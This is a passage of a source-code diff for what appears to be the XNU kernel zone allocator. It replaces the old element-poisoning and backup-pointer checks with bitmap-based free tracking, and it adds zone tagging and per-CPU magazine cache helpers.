*)zba_alloc(order); + zba_unlock(); + + for (size_t i = 0; i < 1u << order; i++) { + if (64 * i + 64 <= count) { + bits[i] = ~0ull; + } else if (64 * i < count) { + bits[i] = zba_map_mask_lt(uint64_t, count); + } else { + bits[i] = 0ull; + } } - } - return FALSE; + meta->zm_bitmap = (uint32_t)((vm_offset_t)bits - + (vm_offset_t)zba_slot_base()) + order; + } } -#if DEBUG || DEVELOPMENT - -vm_size_t -zone_element_info(void *addr, vm_tag_t * ptag) +/*! + * @function zone_meta_bits_merge + * + * @brief + * Adds elements [start, end) to a chunk being extended. + * + * @param meta The main metadata for the extended chunk. + * @param start The index of the first element to add to the chunk. + * @param end The index of the last (exclusive) element to add. 
+ */ +static void +zone_meta_bits_merge(struct zone_page_metadata *meta, + uint32_t start, uint32_t end) { - vm_size_t size = 0; - vm_tag_t tag = VM_KERN_MEMORY_NONE; - struct zone_page_metadata *meta; - struct zone *src_zone; + if (meta->zm_inline_bitmap) { + while (start < end) { + size_t s_i = start / 32; + size_t s_e = end / 32; - if (from_zone_map(addr, sizeof(void *))) { - meta = zone_native_meta_from_addr(addr); - src_zone = &zone_array[meta->zm_index]; -#if VM_MAX_TAG_ZONES - if (__improbable(src_zone->tags)) { - tag = (ZTAG(src_zone, (vm_offset_t) addr)[0] >> 1); + if (s_i == s_e) { + meta[s_i].zm_bitmap |= zba_map_mask_lt(uint32_t, end) & + zba_map_mask_ge(uint32_t, start); + break; + } + + meta[s_i].zm_bitmap |= zba_map_mask_ge(uint32_t, start); + start += 32 - (start % 32); } -#endif /* VM_MAX_TAG_ZONES */ - size = zone_elem_size(src_zone); } else { -#if CONFIG_GZALLOC - gzalloc_element_size(addr, NULL, &size); -#endif /* CONFIG_GZALLOC */ - } - *ptag = tag; - return size; -} + uint64_t *bits = zba_bits_ref_ptr(meta->zm_bitmap); -#endif /* DEBUG || DEVELOPMENT */ + while (start < end) { + size_t s_i = start / 64; + size_t s_e = end / 64; -/* Someone wrote to freed memory. 
*/ -__abortlike -static void -zone_element_was_modified_panic( - zone_t zone, - vm_offset_t element, - vm_offset_t found, - vm_offset_t expected, - vm_offset_t offset) -{ - panic("a freed zone element has been modified in zone %s%s: " - "expected %p but found %p, bits changed %p, " - "at offset %d of %d in element %p, cookies %p %p", - zone_heap_name(zone), - zone->z_name, - (void *) expected, - (void *) found, - (void *) (expected ^ found), - (uint32_t) offset, - (uint32_t) zone_elem_size(zone), - (void *) element, - (void *) zp_nopoison_cookie, - (void *) zp_poisoned_cookie); + if (s_i == s_e) { + bits[s_i] |= zba_map_mask_lt(uint64_t, end) & + zba_map_mask_ge(uint64_t, start); + break; + } + bits[s_i] |= zba_map_mask_ge(uint64_t, start); + start += 64 - (start % 64); + } + } } -/* The backup pointer is stored in the last pointer-sized location in an element. */ -__header_always_inline vm_offset_t * -get_backup_ptr(vm_size_t elem_size, vm_offset_t *element) +/*! + * @function zone_bits_free + * + * @brief + * Frees a bitmap to the zone bitmap allocator. + * + * @param bref + * A bitmap reference set by @c zone_meta_bits_init() in a @c zm_bitmap field. + */ +static void +zone_bits_free(uint32_t bref) { - return (vm_offset_t *)((vm_offset_t)element + elem_size - sizeof(vm_offset_t)); + zba_lock(); + zba_free((vm_offset_t)zba_bits_ref_ptr(bref), zba_bits_ref_order(bref)); + zba_unlock(); } -/* - * The primary and backup pointers don't match. - * Determine which one was likely the corrupted pointer, find out what it - * probably should have been, and panic. +/*! + * @function zone_meta_is_free + * + * @brief + * Returns whether a given element appears free. 
*/ -__abortlike -static void -backup_ptr_mismatch_panic( - zone_t zone, - struct zone_page_metadata *page_meta, - vm_offset_t page, - vm_offset_t element) -{ - vm_offset_t primary = *(vm_offset_t *)element; - vm_offset_t backup = *get_backup_ptr(zone_elem_size(zone), &element); - vm_offset_t likely_backup; - vm_offset_t likely_primary; - zone_addr_kind_t kind = zone_addr_kind(page, zone_elem_size(zone)); - - likely_primary = primary ^ zp_nopoison_cookie; - boolean_t sane_backup; - boolean_t sane_primary = zone_page_meta_is_sane_element(zone, page_meta, - page, likely_primary, kind); - boolean_t element_was_poisoned = (backup & 0x1); - -#if defined(__LP64__) - /* We can inspect the tag in the upper bits for additional confirmation */ - if ((backup & 0xFFFFFF0000000000) == 0xFACADE0000000000) { - element_was_poisoned = TRUE; - } else if ((backup & 0xFFFFFF0000000000) == 0xC0FFEE0000000000) { - element_was_poisoned = FALSE; - } -#endif - - if (element_was_poisoned) { - likely_backup = backup ^ zp_poisoned_cookie; +static bool +zone_meta_is_free(struct zone_page_metadata *meta, zone_element_t ze) +{ + vm_offset_t eidx = zone_element_idx(ze); + if (meta->zm_inline_bitmap) { + uint32_t bit = zba_map_bit(uint32_t, eidx); + return meta[zba_map_index(uint32_t, eidx)].zm_bitmap & bit; } else { - likely_backup = backup ^ zp_nopoison_cookie; - } - sane_backup = zone_page_meta_is_sane_element(zone, page_meta, - page, likely_backup, kind); - - /* The primary is definitely the corrupted one */ - if (!sane_primary && sane_backup) { - zone_element_was_modified_panic(zone, element, primary, (likely_backup ^ zp_nopoison_cookie), 0); - } - - /* The backup is definitely the corrupted one */ - if (sane_primary && !sane_backup) { - zone_element_was_modified_panic(zone, element, backup, - (likely_primary ^ (element_was_poisoned ? zp_poisoned_cookie : zp_nopoison_cookie)), - zone_elem_size(zone) - sizeof(vm_offset_t)); - } - - /* - * Not sure which is the corrupted one. 
- * It's less likely that the backup pointer was overwritten with - * ( (sane address) ^ (valid cookie) ), so we'll guess that the - * primary pointer has been overwritten with a sane but incorrect address. - */ - if (sane_primary && sane_backup) { - zone_element_was_modified_panic(zone, element, primary, (likely_backup ^ zp_nopoison_cookie), 0); + bitmap_t *bits = zba_bits_ref_ptr(meta->zm_bitmap); + uint64_t bit = zba_map_bit(uint64_t, eidx); + return bits[zba_map_index(uint64_t, eidx)] & bit; } - - /* Neither are sane, so just guess. */ - zone_element_was_modified_panic(zone, element, primary, (likely_backup ^ zp_nopoison_cookie), 0); } -/* - * zone_sequestered_page_get - * z is locked +/*! + * @function zone_meta_mark_free + * + * @brief + * Marks an element as free and returns whether it was marked as used. */ -static struct zone_page_metadata * -zone_sequestered_page_get(zone_t z, vm_offset_t *page) +static bool +zone_meta_mark_free(struct zone_page_metadata *meta, zone_element_t ze) { - const zone_addr_kind_t kind = ZONE_ADDR_NATIVE; + vm_offset_t eidx = zone_element_idx(ze); - if (!zone_pva_is_null(z->pages_sequester)) { - if (os_sub_overflow(z->sequester_page_count, z->alloc_pages, - &z->sequester_page_count)) { - zone_accounting_panic(z, "sequester_page_count wrap-around"); + if (meta->zm_inline_bitmap) { + uint32_t bit = zba_map_bit(uint32_t, eidx); + if (meta[zba_map_index(uint32_t, eidx)].zm_bitmap & bit) { + return false; + } + meta[zba_map_index(uint32_t, eidx)].zm_bitmap ^= bit; + } else { + bitmap_t *bits = zba_bits_ref_ptr(meta->zm_bitmap); + uint64_t bit = zba_map_bit(uint64_t, eidx); + if (bits[zba_map_index(uint64_t, eidx)] & bit) { + return false; } - return zone_meta_queue_pop(z, &z->pages_sequester, kind, page); + bits[zba_map_index(uint64_t, eidx)] ^= bit; } - - return NULL; + return true; } -/* - * zone_sequestered_page_populate - * z is unlocked - * page_meta is invalid on failure +/*! 
+ * @function zone_meta_mark_used + * + * @brief + * Marks an element as used and returns whether it was marked as free */ -static kern_return_t -zone_sequestered_page_populate(zone_t z, struct zone_page_metadata *page_meta, - vm_offset_t space, vm_size_t alloc_size, int zflags) +static bool +zone_meta_mark_used(struct zone_page_metadata *meta, zone_element_t ze) { - kern_return_t retval; + vm_offset_t eidx = zone_element_idx(ze); - assert(alloc_size == ptoa(z->alloc_pages)); - retval = kernel_memory_populate(submap_for_zone(z), space, alloc_size, - zflags, VM_KERN_MEMORY_ZONE); - if (retval != KERN_SUCCESS) { - lock_zone(z); - zone_meta_queue_push(z, &z->pages_sequester, page_meta, ZONE_ADDR_NATIVE); - z->sequester_page_count += z->alloc_pages; - unlock_zone(z); + if (meta->zm_inline_bitmap) { + uint32_t bit = zba_map_bit(uint32_t, eidx); + if (meta[zba_map_index(uint32_t, eidx)].zm_bitmap & bit) { + meta[zba_map_index(uint32_t, eidx)].zm_bitmap ^= bit; + return true; + } + } else { + bitmap_t *bits = zba_bits_ref_ptr(meta->zm_bitmap); + uint64_t bit = zba_map_bit(uint64_t, eidx); + if (bits[zba_map_index(uint64_t, eidx)] & bit) { + bits[zba_map_index(uint64_t, eidx)] ^= bit; + return true; + } } - return retval; + return false; } -#pragma mark Zone poisoning/zeroing - +#endif /* !ZALLOC_TEST */ +/*! @} */ +#pragma mark ZTAGS +#if !ZALLOC_TEST +#if VM_MAX_TAG_ZONES /* - * Initialize zone poisoning - * called from zone_bootstrap before any allocations are made from zalloc + * Zone tagging allows for per "tag" accounting of allocations for the kalloc + * zones only. + * + * There are 3 kinds of tags that can be used: + * - pre-registered VM_KERN_MEMORY_* + * - dynamic tags allocated per call sites in core-kernel (using vm_tag_alloc()) + * - per-kext tags computed by IOKit (using the magic VM_TAG_BT marker). + * + * The VM tracks the statistics in lazily allocated structures. + * See vm_tag_will_update_zone(), vm_tag_update_zone_size(). 
+ * + * If for some reason the requested tag cannot be accounted for, + * the tag is forced to VM_KERN_MEMORY_KALLOC which is pre-allocated. + * + * Each allocated element also remembers the tag it was assigned, + * in its ztSlot() which lets zalloc/zfree update statistics correctly. */ -__startup_func -static void -zp_bootstrap(void) -{ - char temp_buf[16]; - /* - * Initialize backup pointer random cookie for poisoned elements - * Try not to call early_random() back to back, it may return - * the same value if mach_absolute_time doesn't have sufficient time - * to tick over between calls. - * (This is only a problem on embedded devices) - */ - zp_poisoned_cookie = (uintptr_t) early_random(); +// for zones with tagging enabled: - /* -zp: enable poisoning for every alloc and free */ - if (PE_parse_boot_argn("-zp", temp_buf, sizeof(temp_buf))) { - zp_factor = 1; - } +// calculate a pointer to the tag base entry, +// holding either a uint32_t the first tag offset for a page in the zone map, +// or two uint16_t tags if the page can only hold one or two elements - /* -no-zp: disable poisoning */ - if (PE_parse_boot_argn("-no-zp", temp_buf, sizeof(temp_buf))) { - zp_factor = 0; - printf("Zone poisoning disabled\n"); - } +#define ZTAGBASE(zone, element) \ + (&((uint32_t *)zone_tagbase_min)[atop((element) - \ + zone_info.zi_map_range[ZONE_ADDR_NATIVE].min_address)]) - /* Initialize backup pointer random cookie for unpoisoned elements */ - zp_nopoison_cookie = (uintptr_t) early_random(); +static vm_offset_t zone_tagbase_min; +static vm_offset_t zone_tagbase_max; +static vm_offset_t zone_tagbase_map_size; +static vm_map_t zone_tagbase_map; -#if MACH_ASSERT - if (zp_poisoned_cookie == zp_nopoison_cookie) { - panic("early_random() is broken: %p and %p are not random\n", - (void *) zp_poisoned_cookie, (void *) zp_nopoison_cookie); - } -#endif +static vm_offset_t zone_tags_min; +static vm_offset_t zone_tags_max; +static vm_offset_t zone_tags_map_size; +static vm_map_t 
zone_tags_map; - /* - * Use the last bit in the backup pointer to hint poisoning state - * to backup_ptr_mismatch_panic. Valid zone pointers are aligned, so - * the low bits are zero. - */ - zp_poisoned_cookie |= (uintptr_t)0x1ULL; - zp_nopoison_cookie &= ~((uintptr_t)0x1ULL); +// simple heap allocator for allocating the tags for new memory -#if defined(__LP64__) - /* - * Make backup pointers more obvious in GDB for 64 bit - * by making OxFFFFFF... ^ cookie = 0xFACADE... - * (0xFACADE = 0xFFFFFF ^ 0x053521) - * (0xC0FFEE = 0xFFFFFF ^ 0x3f0011) - * The high 3 bytes of a zone pointer are always 0xFFFFFF, and are checked - * by the sanity check, so it's OK for that part of the cookie to be predictable. - * - * TODO: Use #defines, xors, and shifts - */ +static LCK_MTX_EARLY_DECLARE(ztLock, &zone_locks_grp); /* heap lock */ - zp_poisoned_cookie &= 0x000000FFFFFFFFFF; - zp_poisoned_cookie |= 0x0535210000000000; /* 0xFACADE */ +enum{ + ztFreeIndexCount = 8, + ztFreeIndexMax = (ztFreeIndexCount - 1), + ztTagsPerBlock = 4 +}; - zp_nopoison_cookie &= 0x000000FFFFFFFFFF; - zp_nopoison_cookie |= 0x3f00110000000000; /* 0xC0FFEE */ +struct ztBlock { +#if __LITTLE_ENDIAN__ + uint64_t free:1, + next:21, + prev:21, + size:21; +#else +// ztBlock needs free bit least significant +#error !__LITTLE_ENDIAN__ #endif +}; +typedef struct ztBlock ztBlock; - /* - * Initialize zp_min_size to two cachelines. Elements smaller than this will - * be zero-ed. 
- */ - ml_cpu_info_t cpu_info; - ml_cpu_get_info(&cpu_info); - zp_min_size = 2 * cpu_info.cache_line_size; -} - -inline uint32_t -zone_poison_count_init(zone_t zone) -{ - return zp_factor + (((uint32_t)zone_elem_size(zone)) >> zp_scale) ^ - (mach_absolute_time() & 0x7); -} +static ztBlock * ztBlocks; +static uint32_t ztBlocksCount; +static uint32_t ztBlocksFree; -#if ZALLOC_ENABLE_POISONING -static bool -zfree_poison_element(zone_t zone, uint32_t *zp_count, vm_offset_t elem) +static uint32_t +ztLog2up(uint32_t size) { - bool poison = false; - uint32_t zp_count_local; - - assert(!zone->percpu); - if (zp_factor != 0) { - /* - * Poison the memory of every zp_count-th element before it ends up - * on the freelist to catch use-after-free and use of uninitialized - * memory. - * - * Every element is poisoned when zp_factor is set to 1. - * - */ - zp_count_local = os_atomic_load(zp_count, relaxed); - if (__improbable(zp_count_local == 0 || zp_factor == 1)) { - poison = true; - - os_atomic_store(zp_count, zone_poison_count_init(zone), relaxed); - - /* memset_pattern{4|8} could help make this faster: */ - vm_offset_t *element_cursor = ((vm_offset_t *) elem); - vm_offset_t *end_cursor = (vm_offset_t *)(elem + zone_elem_size(zone)); - - for (; element_cursor < end_cursor; element_cursor++) { - *element_cursor = ZONE_POISON; - } - } else { - os_atomic_store(zp_count, zp_count_local - 1, relaxed); - /* - * Zero first zp_min_size bytes of elements that aren't being poisoned. - * Element size is larger than zp_min_size in this path as elements - * that are smaller will always be zero-ed. 
- */ - bzero((void *) elem, zp_min_size); - } + if (1 == size) { + size = 0; + } else { + size = 32 - __builtin_clz(size - 1); } - return poison; -} -#else -static bool -zfree_poison_element(zone_t zone, uint32_t *zp_count, vm_offset_t elem) -{ -#pragma unused(zone, zp_count, elem) - assert(!zone->percpu); - return false; + return size; } -#endif -__attribute__((always_inline)) -static bool -zfree_clear(zone_t zone, vm_offset_t addr, vm_size_t elem_size) +// pointer to the tag for an element +static vm_tag_t * +ztSlot(zone_t zone, vm_offset_t element) { - assert(zone->zfree_clear_mem); - if (zone->percpu) { - zpercpu_foreach_cpu(i) { - bzero((void *)(addr + ptoa(i)), elem_size); + vm_tag_t *result; + if (zone->tags_inline) { + result = (vm_tag_t *)ZTAGBASE(zone, element); + if ((PAGE_MASK & element) >= zone_elem_size(zone)) { + result++; } } else { - bzero((void *)addr, elem_size); + result = &((vm_tag_t *)zone_tags_min)[ZTAGBASE(zone, element)[0] + + (element & PAGE_MASK) / zone_elem_size(zone)]; } - - return true; + return result; } -/* - * Zero the element if zone has zfree_clear_mem flag set else poison - * the element if zp_count hits 0. 
- */ -__attribute__((always_inline)) -bool -zfree_clear_or_poison(zone_t zone, uint32_t *zp_count, vm_offset_t addr) +static uint32_t +ztLog2down(uint32_t size) { - vm_size_t elem_size = zone_elem_size(zone); - - if (zone->zfree_clear_mem) { - return zfree_clear(zone, addr, elem_size); - } - - return zfree_poison_element(zone, zp_count, (vm_offset_t)addr); + size = 31 - __builtin_clz(size); + return size; } +static void +ztFault(vm_map_t map, const void * address, size_t size, uint32_t flags) +{ + vm_map_offset_t addr = (vm_map_offset_t) address; + vm_map_offset_t page, end; + + page = trunc_page(addr); + end = round_page(addr + size); + + for (; page < end; page += page_size) { + if (!pmap_find_phys(kernel_pmap, page)) { + kern_return_t __unused + ret = kernel_memory_populate(map, page, PAGE_SIZE, + KMA_KOBJECT | flags, VM_KERN_MEMORY_DIAG); + assert(ret == KERN_SUCCESS); + } + } +} + +static boolean_t +ztPresent(const void * address, size_t size) +{ + vm_map_offset_t addr = (vm_map_offset_t) address; + vm_map_offset_t page, end; + boolean_t result; + + page = trunc_page(addr); + end = round_page(addr + size); + for (result = TRUE; (page < end); page += page_size) { + result = pmap_find_phys(kernel_pmap, page); + if (!result) { + break; + } + } + return result; +} + + +void __unused +ztDump(boolean_t sanity); +void __unused +ztDump(boolean_t sanity) +{ + uint32_t q, cq, p; + + for (q = 0; q <= ztFreeIndexMax; q++) { + p = q; + do{ + if (sanity) { + cq = ztLog2down(ztBlocks[p].size); + if (cq > ztFreeIndexMax) { + cq = ztFreeIndexMax; + } + if (!ztBlocks[p].free + || ((p != q) && (q != cq)) + || (ztBlocks[ztBlocks[p].next].prev != p) + || (ztBlocks[ztBlocks[p].prev].next != p)) { + kprintf("zterror at %d", p); + ztDump(FALSE); + kprintf("zterror at %d", p); + assert(FALSE); + } + continue; + } + kprintf("zt[%03d]%c %d, %d, %d\n", + p, ztBlocks[p].free ? 
'F' : 'A', + ztBlocks[p].next, ztBlocks[p].prev, + ztBlocks[p].size); + p = ztBlocks[p].next; + if (p == q) { + break; + } + }while (p != q); + if (!sanity) { + printf("\n"); + } + } + if (!sanity) { + printf("-----------------------\n"); + } +} + + + +#define ZTBDEQ(idx) \ + ztBlocks[ztBlocks[(idx)].prev].next = ztBlocks[(idx)].next; \ + ztBlocks[ztBlocks[(idx)].next].prev = ztBlocks[(idx)].prev; + +static void +ztFree(zone_t zone __unused, uint32_t index, uint32_t count) +{ + uint32_t q, w, p, size, merge; + + assert(count); + ztBlocksFree += count; + + // merge with following + merge = (index + count); + if ((merge < ztBlocksCount) + && ztPresent(&ztBlocks[merge], sizeof(ztBlocks[merge])) + && ztBlocks[merge].free) { + ZTBDEQ(merge); + count += ztBlocks[merge].size; + } + + // merge with preceding + merge = (index - 1); + if ((merge > ztFreeIndexMax) + && ztPresent(&ztBlocks[merge], sizeof(ztBlocks[merge])) + && ztBlocks[merge].free) { + size = ztBlocks[merge].size; + count += size; + index -= size; + ZTBDEQ(index); + } + + q = ztLog2down(count); + if (q > ztFreeIndexMax) { + q = ztFreeIndexMax; + } + w = q; + // queue in order of size + while (TRUE) { + p = ztBlocks[w].next; + if (p == q) { + break; + } + if (ztBlocks[p].size >= count) { + break; + } + w = p; + } + ztBlocks[p].prev = index; + ztBlocks[w].next = index; + + // fault in first + ztFault(zone_tags_map, &ztBlocks[index], sizeof(ztBlocks[index]), 0); + + // mark first & last with free flag and size + ztBlocks[index].free = TRUE; + ztBlocks[index].size = count; + ztBlocks[index].prev = w; + ztBlocks[index].next = p; + if (count > 1) { + index += (count - 1); + // fault in last + ztFault(zone_tags_map, &ztBlocks[index], sizeof(ztBlocks[index]), 0); + ztBlocks[index].free = TRUE; + ztBlocks[index].size = count; + } +} + +static uint32_t +ztAlloc(zone_t zone, uint32_t count) +{ + uint32_t q, w, p, leftover; + + assert(count); + + q = ztLog2up(count); + if (q > ztFreeIndexMax) { + q = ztFreeIndexMax; + } +
do{ + w = q; + while (TRUE) { + p = ztBlocks[w].next; + if (p == q) { + break; + } + if (ztBlocks[p].size >= count) { + // dequeue, mark both ends allocated + ztBlocks[w].next = ztBlocks[p].next; + ztBlocks[ztBlocks[p].next].prev = w; + ztBlocks[p].free = FALSE; + ztBlocksFree -= ztBlocks[p].size; + if (ztBlocks[p].size > 1) { + ztBlocks[p + ztBlocks[p].size - 1].free = FALSE; + } + + // fault all the allocation + ztFault(zone_tags_map, &ztBlocks[p], count * sizeof(ztBlocks[p]), 0); + // mark last as allocated + if (count > 1) { + ztBlocks[p + count - 1].free = FALSE; + } + // free remainder + leftover = ztBlocks[p].size - count; + if (leftover) { + ztFree(zone, p + ztBlocks[p].size - leftover, leftover); + } + + return p; + } + w = p; + } + q++; + }while (q <= ztFreeIndexMax); + + return -1U; +} + +__startup_func +static void +zone_tagging_init(vm_size_t max_zonemap_size) +{ + kern_return_t ret; + vm_map_kernel_flags_t vmk_flags; + uint32_t idx; + + // allocate submaps VM_KERN_MEMORY_DIAG + + zone_tagbase_map_size = atop(max_zonemap_size) * sizeof(uint32_t); + vmk_flags = VM_MAP_KERNEL_FLAGS_NONE; + vmk_flags.vmkf_permanent = TRUE; + ret = kmem_suballoc(kernel_map, &zone_tagbase_min, zone_tagbase_map_size, + FALSE, VM_FLAGS_ANYWHERE, vmk_flags, VM_KERN_MEMORY_DIAG, + &zone_tagbase_map); + + if (ret != KERN_SUCCESS) { + panic("zone_init: kmem_suballoc failed"); + } + zone_tagbase_max = zone_tagbase_min + round_page(zone_tagbase_map_size); + + zone_tags_map_size = 2048 * 1024 * sizeof(vm_tag_t); + vmk_flags = VM_MAP_KERNEL_FLAGS_NONE; + vmk_flags.vmkf_permanent = TRUE; + ret = kmem_suballoc(kernel_map, &zone_tags_min, zone_tags_map_size, + FALSE, VM_FLAGS_ANYWHERE, vmk_flags, VM_KERN_MEMORY_DIAG, + &zone_tags_map); + + if (ret != KERN_SUCCESS) { + panic("zone_init: kmem_suballoc failed"); + } + zone_tags_max = zone_tags_min + round_page(zone_tags_map_size); + + ztBlocks = (ztBlock *) zone_tags_min; + ztBlocksCount = (uint32_t)(zone_tags_map_size / sizeof(ztBlock)); 
+ + // initialize the qheads + lck_mtx_lock(&ztLock); + + ztFault(zone_tags_map, &ztBlocks[0], sizeof(ztBlocks[0]), 0); + for (idx = 0; idx < ztFreeIndexCount; idx++) { + ztBlocks[idx].free = TRUE; + ztBlocks[idx].next = idx; + ztBlocks[idx].prev = idx; + ztBlocks[idx].size = 0; + } + // free remaining space + ztFree(NULL, ztFreeIndexCount, ztBlocksCount - ztFreeIndexCount); + + lck_mtx_unlock(&ztLock); +} + +static void +ztMemoryAdd(zone_t zone, vm_offset_t mem, vm_size_t size) +{ + uint32_t * tagbase; + uint32_t count, block, blocks, idx; + size_t pages; + + pages = atop(size); + tagbase = ZTAGBASE(zone, mem); + + lck_mtx_lock(&ztLock); + + // fault tagbase + ztFault(zone_tagbase_map, tagbase, pages * sizeof(uint32_t), 0); + + if (!zone->tags_inline) { + // allocate tags + count = (uint32_t)(size / zone_elem_size(zone)); + blocks = ((count + ztTagsPerBlock - 1) / ztTagsPerBlock); + block = ztAlloc(zone, blocks); + if (-1U == block) { + ztDump(false); + } + assert(-1U != block); + } + + lck_mtx_unlock(&ztLock); + + if (!zone->tags_inline) { + // set tag base for each page + block *= ztTagsPerBlock; + for (idx = 0; idx < pages; idx++) { + vm_offset_t esize = zone_elem_size(zone); + tagbase[idx] = block + (uint32_t)((ptoa(idx) + esize - 1) / esize); + } + } +} + +static void +ztMemoryRemove(zone_t zone, vm_offset_t mem, vm_size_t size) +{ + uint32_t * tagbase; + uint32_t count, block, blocks, idx; + size_t pages; + + // set tag base for each page + pages = atop(size); + tagbase = ZTAGBASE(zone, mem); + block = tagbase[0]; + for (idx = 0; idx < pages; idx++) { + tagbase[idx] = 0xFFFFFFFF; + } + + lck_mtx_lock(&ztLock); + if (!zone->tags_inline) { + count = (uint32_t)(size / zone_elem_size(zone)); + blocks = ((count + ztTagsPerBlock - 1) / ztTagsPerBlock); + assert(block != 0xFFFFFFFF); + block /= ztTagsPerBlock; + ztFree(NULL /* zone is unlocked */, block, blocks); + } + + lck_mtx_unlock(&ztLock); +} + +uint32_t +zone_index_from_tag_index(uint32_t tag_zone_index, 
vm_size_t * elem_size) +{ + simple_lock(&all_zones_lock, &zone_locks_grp); + + zone_index_foreach(idx) { + zone_t z = &zone_array[idx]; + if (!z->tags) { + continue; + } + if (tag_zone_index != z->tag_zone_index) { + continue; + } + + *elem_size = zone_elem_size(z); + simple_unlock(&all_zones_lock); + return idx; + } + + simple_unlock(&all_zones_lock); + + return -1U; +} + +#endif /* VM_MAX_TAG_ZONES */ +#endif /* !ZALLOC_TEST */ +#pragma mark zalloc helpers +#if !ZALLOC_TEST + +__pure2 +static inline uint16_t +zc_mag_size(void) +{ + return zc_magazine_size; +} + +__attribute__((noinline, cold)) +static void +zone_lock_was_contended(zone_t zone, zone_cache_t zc) +{ + lck_spin_lock_nopreempt(&zone->z_lock); + + /* + * If zone caching has been disabled due to memory pressure, + * then recording contention is not useful, give the system + * time to recover. + */ + if (__improbable(zone_caching_disabled)) { + return; + } + + zone->z_contention_cur++; + + if (zc == NULL || zc->zc_depot_max >= INT16_MAX * zc_mag_size()) { + return; + } + + /* + * Let the depot grow based on how bad the contention is, + * and how populated the zone is. 
+ */ + if (zone->z_contention_wma < 2 * Z_CONTENTION_WMA_UNIT) { + if (zc->zc_depot_max * zpercpu_count() * 20u >= + zone->z_elems_avail) { + return; + } + } + if (zone->z_contention_wma < 4 * Z_CONTENTION_WMA_UNIT) { + if (zc->zc_depot_max * zpercpu_count() * 10u >= + zone->z_elems_avail) { + return; + } + } + if (!zc_grow_threshold || zone->z_contention_wma < + zc_grow_threshold * Z_CONTENTION_WMA_UNIT) { + return; + } + + zc->zc_depot_max++; +} + +static inline void +zone_lock_nopreempt_check_contention(zone_t zone, zone_cache_t zc) +{ + if (lck_spin_try_lock_nopreempt(&zone->z_lock)) { + return; + } + + zone_lock_was_contended(zone, zc); +} + +static inline void +zone_lock_check_contention(zone_t zone, zone_cache_t zc) +{ + disable_preemption(); + zone_lock_nopreempt_check_contention(zone, zc); +} + +static inline void +zone_unlock_nopreempt(zone_t zone) +{ + lck_spin_unlock_nopreempt(&zone->z_lock); +} + +static inline void +zone_depot_lock_nopreempt(zone_cache_t zc) +{ + hw_lock_bit_nopreempt(&zc->zc_depot_lock, 0, &zone_locks_grp); +} + +static inline void +zone_depot_unlock_nopreempt(zone_cache_t zc) +{ + hw_unlock_bit_nopreempt(&zc->zc_depot_lock, 0); +} + +static inline void +zone_depot_lock(zone_cache_t zc) +{ + hw_lock_bit(&zc->zc_depot_lock, 0, &zone_locks_grp); +} + +static inline void +zone_depot_unlock(zone_cache_t zc) +{ + hw_unlock_bit(&zc->zc_depot_lock, 0); +} + +const char * +zone_name(zone_t z) +{ + return z->z_name; +} + +const char * +zone_heap_name(zone_t z) +{ + if (__probable(z->kalloc_heap < KHEAP_ID_COUNT)) { + return kalloc_heap_names[z->kalloc_heap]; + } + return "invalid"; +} + +static uint32_t +zone_alloc_pages_for_nelems(zone_t z, vm_size_t max_elems) +{ + vm_size_t elem_count, chunks; + + elem_count = ptoa(z->z_percpu ? 
1 : z->z_chunk_pages) / zone_elem_size(z); + chunks = (max_elems + elem_count - 1) / elem_count; + + return (uint32_t)MIN(UINT32_MAX, chunks * z->z_chunk_pages); +} + +static inline vm_size_t +zone_submaps_approx_size(void) +{ + vm_size_t size = 0; + + for (unsigned idx = 0; idx <= zone_last_submap_idx; idx++) { + size += zone_submaps[idx]->size; + } + + return size; +} + +static void +zone_cache_swap_magazines(zone_cache_t cache) +{ + uint16_t count_a = cache->zc_alloc_cur; + uint16_t count_f = cache->zc_free_cur; + zone_element_t *elems_a = cache->zc_alloc_elems; + zone_element_t *elems_f = cache->zc_free_elems; + + z_debug_assert(count_a <= zc_mag_size()); + z_debug_assert(count_f <= zc_mag_size()); + + cache->zc_alloc_cur = count_f; + cache->zc_free_cur = count_a; + cache->zc_alloc_elems = elems_f; + cache->zc_free_elems = elems_a; +} + +/*! + * @function zone_magazine_load + * + * @brief + * Cache the value of @c zm_cur on the cache to avoid a dependent load + * on the allocation fastpath. + */ +static void +zone_magazine_load(uint16_t *count, zone_element_t **elems, zone_magazine_t mag) +{ + z_debug_assert(mag->zm_cur <= zc_mag_size()); + *count = mag->zm_cur; + *elems = mag->zm_elems; +} + +/*! + * @function zone_magazine_replace + * + * @brief + * Unload a magazine and load a new one instead. 
+ */ +static zone_magazine_t +zone_magazine_replace(uint16_t *count, zone_element_t **elems, + zone_magazine_t mag) +{ + zone_magazine_t old; + + old = (zone_magazine_t)((uintptr_t)*elems - + offsetof(struct zone_magazine, zm_elems)); + old->zm_cur = *count; + z_debug_assert(old->zm_cur <= zc_mag_size()); + zone_magazine_load(count, elems, mag); + + return old; +} + +static zone_magazine_t +zone_magazine_alloc(zalloc_flags_t flags) +{ + return zalloc_ext(zc_magazine_zone, zc_magazine_zone->z_stats, + flags | Z_ZERO); +} + +static void +zone_magazine_free(zone_magazine_t mag) +{ + zfree_ext(zc_magazine_zone, zc_magazine_zone->z_stats, mag); +} + +static void +zone_enable_caching(zone_t zone) +{ + zone_cache_t caches; + + caches = zalloc_percpu_permanent_type(struct zone_cache); + zpercpu_foreach(zc, caches) { + zone_magazine_load(&zc->zc_alloc_cur, &zc->zc_alloc_elems, + zone_magazine_alloc(Z_WAITOK | Z_NOFAIL)); + zone_magazine_load(&zc->zc_free_cur, &zc->zc_free_elems, + zone_magazine_alloc(Z_WAITOK | Z_NOFAIL)); + STAILQ_INIT(&zc->zc_depot); + } + + if (os_atomic_xchg(&zone->z_pcpu_cache, caches, release)) { + panic("allocating caches for zone %s twice", zone->z_name); + } +} + +bool +zone_maps_owned(vm_address_t addr, vm_size_t size) +{ + return from_zone_map(addr, size, ZONE_ADDR_NATIVE); +} + +void +zone_map_sizes( + vm_map_size_t *psize, + vm_map_size_t *pfree, + vm_map_size_t *plargest_free) +{ + vm_map_size_t size, free, largest; + + vm_map_sizes(zone_submaps[0], psize, pfree, plargest_free); + + for (uint32_t i = 1; i <= zone_last_submap_idx; i++) { + vm_map_sizes(zone_submaps[i], &size, &free, &largest); + *psize += size; + *pfree += free; + *plargest_free = MAX(*plargest_free, largest); + } +} + +__attribute__((always_inline)) +vm_map_t +zone_submap(zone_t zone) +{ + return zone_submaps[zone->z_submap_idx]; +} + +unsigned +zpercpu_count(void) +{ + return zpercpu_early_count; +} + +int +track_this_zone(const char *zonename, const char *logname) +{ + 
